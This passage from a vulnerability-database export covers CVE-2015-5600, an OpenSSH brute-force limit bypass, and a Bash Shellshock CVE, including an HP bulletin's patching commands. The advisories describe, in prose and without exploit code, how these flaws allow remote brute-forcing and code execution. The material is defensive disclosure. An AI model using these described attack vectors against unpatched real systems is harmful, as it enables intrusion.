"VULMON", "id": "CVE-2015-5600" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "132875" }, { "db": "PACKETSTORM", "id": "133087" }, { "db": "PACKETSTORM", "id": "136977" }, { "db": "PACKETSTORM", "id": "133130" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "135009" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-5600", "trust": 3.5 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/07/23/4", "trust": 2.5 }, { "db": "BID", "id": "75990", "trust": 2.0 }, { "db": "MCAFEE", "id": "SB10157", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10136", "trust": 1.7 }, { "db": "BID", "id": "92012", "trust": 1.7 }, { "db": "BID", "id": "91787", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "SECTRACK", "id": "1032988", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10697", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2015-003969", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201508-001", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.3 }, { "db": "MCAFEE", "id": "SB10164", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-5600", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137294", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132875", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133087", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136977", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133130", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135505", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135009", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5600" }, { "db": "BID", "id": "75990" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "132875" }, { "db": "PACKETSTORM", "id": "133087" }, { "db": "PACKETSTORM", "id": "136977" }, { "db": "PACKETSTORM", "id": "133130" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "CNNVD", "id": "CNNVD-201508-001" }, { "db": "NVD", "id": "CVE-2015-5600" } ] }, "id": "VAR-201508-0620", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4615448 }, "last_update_date": "2024-07-22T22:56:58.009000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html" }, { "title": "HT205031", "trust": 0.8, "url": "https://support.apple.com/en-us/ht205031" }, { "title": "HT205031", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht205031" }, { "title": "CVS log for src/usr.bin/ssh/auth2-chall.c", "trust": 0.8, "url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c" }, { "title": "Diff for /src/usr.bin/ssh/auth2-chall.c between version 1.42 and 1.43", "trust": 0.8, "url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c.diff?r1=1.42\u0026r2=1.43\u0026f=h" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "OpenSSH\u306e\u8106\u5f31\u6027(CVE-2015-5600)\u306b\u3088\u308bBIG-IP1500\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/openssh_cve20155600_big.html" }, { "title": "auth2-chall", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=57086" }, { "title": "Red Hat: Moderate: openssh security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152088 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-5352: XSECURITY restrictions bypass under certain conditions in ssh", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=cb1cb0a27af47a61a0356f0de0943be8" }, { "title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=6ddb8aa51aaa09b7fbd5a473e33cd0f9" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2710-1" }, { "title": "Ubuntu Security Notice: openssh regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2710-2" }, { "title": "Red Hat: CVE-2015-5600", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-5600" }, { "title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-6563 CVE-2015-6564", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=73eb91ff53511af2767cd29878bd74dc" }, { "title": "Amazon Linux AMI: ALAS-2015-625", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-625" }, { "title": "Symantec Security Advisories: SA104 : OpenSSH Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b643e473a764678a8d1ded300d5699b6" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83" }, { "title": "Final_Project_CyberBootcamp", "trust": 0.1, "url": "https://github.com/pboonman196/final_project_cyberbootcamp " }, { "title": "IDS-Evasion", "trust": 0.1, "url": "https://github.com/ahm3dhany/ids-evasion " }, { "title": "clair-lab", "trust": 0.1, "url": "https://github.com/sjourdan/clair-lab " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5600" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "CNNVD", "id": "CNNVD-201508-001" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "NVD", "id": "CVE-2015-5600" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://openwall.com/lists/oss-security/2015/07/23/4" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.9, "url": "http://www.ubuntu.com/usn/usn-2710-1" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201512-04" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2710-2" }, { "trust": 1.7, "url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c.diff?r1=1.42\u0026r2=1.43\u0026f=h" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2015/jul/92" }, { "trust": 1.7, "url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-july/162955.html" }, { "trust": 1.7, "url": "https://support.apple.com/kb/ht205031" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05157667" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05128992" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/75990" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/92012" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-0466.html" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10157" }, { "trust": 1.7, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04952480" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10697" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10136" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00017.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/165170.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1032988" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20151106-0001/" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.7, "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html" }, { "trust": 1.7, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1174-security-advisory-12" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5600" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-5600" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5600" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2015/q3/156" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/134" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/141" }, { "trust": 0.3, "url": "http://www.openssh.com" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.3, "url": "http://prod.lists.apple.com/archives/security-announce/2015/aug/msg00001.html" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04952480" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05157667" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05128992" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10164" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099240" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098977" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21969670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/openssh_cve20155600_big.html" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.3, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.3, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5352" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/264.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2088" }, { "trust": 0.1, "url": "https://github.com/pboonman196/final_project_cyberbootcamp" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2710-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5600" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=40178" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/swd/public" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5161" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0800" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5600\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:16/openssh.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:16/openssh.patch" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:16/openssh-8-errata.patc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:16/openssh-8-errata.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:16.openssh.asc\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2653\u003e" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2653" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:16/openssh-8.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:16/openssh-8.patch" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.6" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.7" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.3" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1485719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5477" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5722" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5352" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6565" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6563" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5600" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6564" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5600" }, { "db": "BID", "id": "75990" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "132875" }, { "db": "PACKETSTORM", "id": "133087" }, { "db": "PACKETSTORM", "id": "136977" }, { "db": "PACKETSTORM", "id": "133130" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "CNNVD", "id": "CNNVD-201508-001" }, { "db": "NVD", "id": "CVE-2015-5600" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-5600" }, { "db": "BID", "id": "75990" }, { "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "132875" }, { "db": "PACKETSTORM", "id": "133087" }, { "db": "PACKETSTORM", "id": "136977" }, { "db": "PACKETSTORM", "id": "133130" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "CNNVD", "id": "CNNVD-201508-001" }, { "db": "NVD", "id": "CVE-2015-5600" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-08-03T00:00:00", "db": "VULMON", "id": "CVE-2015-5600" }, { "date": "2015-07-22T00:00:00", "db": "BID", "id": "75990" }, { "date": "2015-08-04T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "date": "2016-06-02T16:22:00", "db": "PACKETSTORM", "id": "137294" }, { "date": "2015-07-28T22:22:22", "db": "PACKETSTORM", "id": "132875" }, { "date": "2015-08-14T20:53:10", "db": "PACKETSTORM", "id": "133087" }, { "date": "2016-05-12T16:07:26", "db": "PACKETSTORM", "id": "136977" }, { "date": "2015-08-18T22:29:09", "db": "PACKETSTORM", "id": "133130" }, { "date": "2016-01-29T20:34:00", "db": "PACKETSTORM", "id": "135505" }, { "date": "2015-12-21T23:23:00", "db": "PACKETSTORM", "id": "135009" }, { "date": "2015-08-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-001" }, { "date": "2015-08-03T01:59:03.950000", "db": "NVD", "id": "CVE-2015-5600" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2015-5600" }, { "date": "2017-01-23T00:06:00", "db": "BID", "id": "75990" }, { "date": "2016-07-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-003969" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-001" }, { "date": "2022-12-13T12:15:17.307000", "db": "NVD", "id": "CVE-2015-5600" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "133087" }, { "db": "CNNVD", "id": "CNNVD-201508-001" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Openssh of sshd of auth2-chall.c Inside kbdint_next_device Vulnerability to execute brute force attacks in functions", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-003969" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control issues", "sources": [ { "db": "CNNVD", "id": "CNNVD-201508-001" } ], "trust": 0.6 } }
var-201409-1155
Vulnerability from variot
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution. GNU Bash is prone to a local memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. GNU Bash 3.2 and later are vulnerable; prior versions may also be affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04558068
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04558068 Version: 1
HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-02-02 Last Updated: 2015-02-02
Potential Security Impact: Multiple vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control for Linux Central Management Server Pre-boot Execution Environment that could be exploited remotely resulting in Denial of Service (DoS), disclosure of information, and other vulnerabilities.
References:
CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-7196 SSRT101742
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve these vulnerabilities.
Follow these steps to update the HP Insight Control for Linux Central Management Server Pre-boot Execution Environment:
NOTE: The following procedure updates the bash shell on the Linux Pre-boot Execution Environment. Please update the Bash shell version on the HP Insight Control for Linux Central Management Server also. On the Production RHEL 6.2 OS:
a. Prepare temporary directory for Bash update software:
mkdir -p $HOME/tmp/bash
cd $HOME/tmp/bash
pwd
b.
c. Extract the Bash update software package.
rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv
d. Verify the version of the Bash update software:
./bin/bash --version
GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)
e. Verify version dependencies:
ldd ./bin/bash
linux-gate.so.1 => (0x008a7000) libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000) libdl.so.2 => /lib/libdl.so.2 (0x002c0000) libc.so.6 => /lib/libc.so.6 (0x0012e000) /lib/ld-linux.so.2 (0x00108000)
f. Create archive file from '/lib' to copy and install on the Insight Control for Linux Central Management Server Pre-boot Execution Environment system:
mkdir $HOME/tmp/lib
cd /lib
cp * $HOME/tmp/lib
cd $HOME/tmp
pwd
tar cvf bash_lib.tar *
- Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production RHEL 6.2 OS system to the Insight Control for Linux Central Management Server Pre-boot Execution Environment system. On the HP Insight Control for Linux Central Managment Server Pre-boot Execution Environment system:
a. Create a temporary folder for the toolkit and copy the toolkit there :
mkdir -p $HOME/tmp/temp-toolkit
cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz
$HOME/tmp/temp-toolkit
b. Extract the file 'toolkit.tar.gz' into the temporary folder:
cd $HOME/tmp/temp-toolkit
tar zxvf toolkit.tar.gz
mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp
c. Verify the version of the toolkit Bash:
$HOME/tmp/temp-toolkit/bin/bash --version
GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc.
d. Verify dependencies versions:
ldd $HOME/tmp/temp-toolkit/bin/bash
linux-gate.so.1 => (0xffffe000) libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000) libdl.so.2 => /lib/libdl.so.2 (0x008bf000) libc.so.6 => /lib/libc.so.6 (0x00777000) /lib/ld-linux.so.2 (0x00755000)
e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' . Then copy the bash binary and the library files to their respective locations:
tar xvf $HOME/tmp/bash_lib
cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin
cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib
f. Create the updated toolkit gzipped archive file and place in /usr/share/systemimager/boot/i386/standard
tar czvf toolkit.tar.gz *
cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard
HISTORY Version:1 (rev.1) - 2 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
